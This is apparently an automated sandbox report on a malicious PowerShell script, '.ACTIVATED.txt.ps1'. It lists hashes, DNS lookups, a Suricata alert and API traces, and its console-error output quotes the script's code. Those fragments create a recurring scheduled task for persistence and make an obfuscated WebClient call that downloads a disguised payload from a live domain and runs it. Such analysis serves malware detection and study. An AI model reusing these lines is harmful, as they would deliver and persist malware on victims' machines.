popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

.ACTIVATED.txt.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 6, 2023, 9:49 a.m. Sept. 6, 2023, 9:51 a.m.
Size 1.9KB
Type ASCII text, with CRLF line terminators
MD5 a11d9710bf81fe62ed4ff6c69636c5ad
SHA256 1ea088faf229642907df2f669b269bfbf84af19593daa3061df4b35b9ae60ced
CRC32 01938C1F
ssdeep 48:5EIYK6Z1/PWLs8vhjZTF39VDC+RN9KEfwN9NEpN9zEL:g51/Pys8ZjdF37DRr9hu9yT94L
Yara None matched

Name Response Post-Analysis Lookup
www.kbproducciones.com
CNAME kbproducciones.com
A 50.63.15.171
50.63.15.171
IP Address Status Action
164.124.101.2 Active Moloch
50.63.15.171 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 50.63.15.171:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49167
50.63.15.171:443 		C=US, O=DigiCert Inc, OU=www.digicert.com, CN=RapidSSL TLS RSA CA G1 CN=kbproducciones.com f6:66:91:c6:36:7f:fc:41:a1:2e:cd:e6:8a:e1:3f:c6:bc:04:27:b0

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Mode LastWriteTime Length Name
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: d---- 2023-09-06 오전 9:49 Document
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f
console_handle: 0x00000037
1 1 0

WriteConsoleW

 buffer: unction, script file, or operable program. Check the spelling of the name, or i
console_handle: 0x00000043
1 1 0

WriteConsoleW

 buffer: f a path was included, verify that the path is correct and try again.
console_handle: 0x0000004f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:17 char:34
console_handle: 0x0000005b
1 1 0

WriteConsoleW

 buffer: + $action = New-ScheduledTaskAction <<<< -Execute 'C:\ProgramData\Document\sCh
console_handle: 0x00000067
1 1 0

WriteConsoleW

 buffer: ildKey.vbs'
console_handle: 0x00000073
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskAction:String)
console_handle: 0x0000007f
1 1 0

WriteConsoleW

 buffer: [], CommandNotFoundException
console_handle: 0x0000008b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskTrigger' is not recognized as the name of a cmdlet,
console_handle: 0x000000b7
1 1 0

WriteConsoleW

 buffer: function, script file, or operable program. Check the spelling of the name, or
console_handle: 0x000000c3
1 1 0

WriteConsoleW

 buffer: if a path was included, verify that the path is correct and try again.
console_handle: 0x000000cf
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:18 char:36
console_handle: 0x000000db
1 1 0

WriteConsoleW

 buffer: + $trigger = New-ScheduledTaskTrigger <<<< -Once -At (Get-Date) -RepetitionInt
console_handle: 0x000000e7
1 1 0

WriteConsoleW

 buffer: erval (New-TimeSpan -Minutes 2)
console_handle: 0x000000f3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskTrigger:String
console_handle: 0x000000ff
1 1 0

WriteConsoleW

 buffer: ) [], CommandNotFoundException
console_handle: 0x0000010b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000117
1 1 0

WriteConsoleW

 buffer: The term 'Register-ScheduledTask' is not recognized as the name of a cmdlet, fu
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: nction, script file, or operable program. Check the spelling of the name, or if
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: a path was included, verify that the path is correct and try again.
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:19 char:23
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: + Register-ScheduledTask <<<< -Action $action -Trigger $trigger -TaskName "Ver
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: sionNumber"
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Register-ScheduledTask:String)
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: [], CommandNotFoundException
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x000000ab
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x000000b7
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:43 char:72
console_handle: 0x000000c3
1 1 0

WriteConsoleW

 buffer: + if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e" <<<<
console_handle: 0x000000cf
1 1 0

WriteConsoleW

 buffer: ('https://www.kbproducciones.com/.TEAK/.M1.jpg', $NEWS + 'Managing.ps1')){
console_handle: 0x000000db
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e7
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000f3
1 1 0

WriteConsoleW

 buffer: The term 'C:\ProgramData\Document\Managing.ps1' is not recognized as the name o
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: f a cmdlet, function, script file, or operable program. Check the spelling of t
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: he name, or if a path was included, verify that the path is correct and try aga
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: in.
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:2
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + & <<<< C:\ProgramData\Document\Managing.ps1
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (C:\ProgramData\Document\Managin
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: g.ps1:String) [], CommandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x060cfcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x060cfcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d09b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d0e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d10b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02709000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05611000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05612000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05613000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05461000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06380000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06570000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06571000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06572000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06573000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06574000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05614000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05615000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05616000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02779000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05671000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06575000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0657a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05617000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05618000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2860
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73662000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2940
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2940
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02742000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Document\sChildKey.vbs
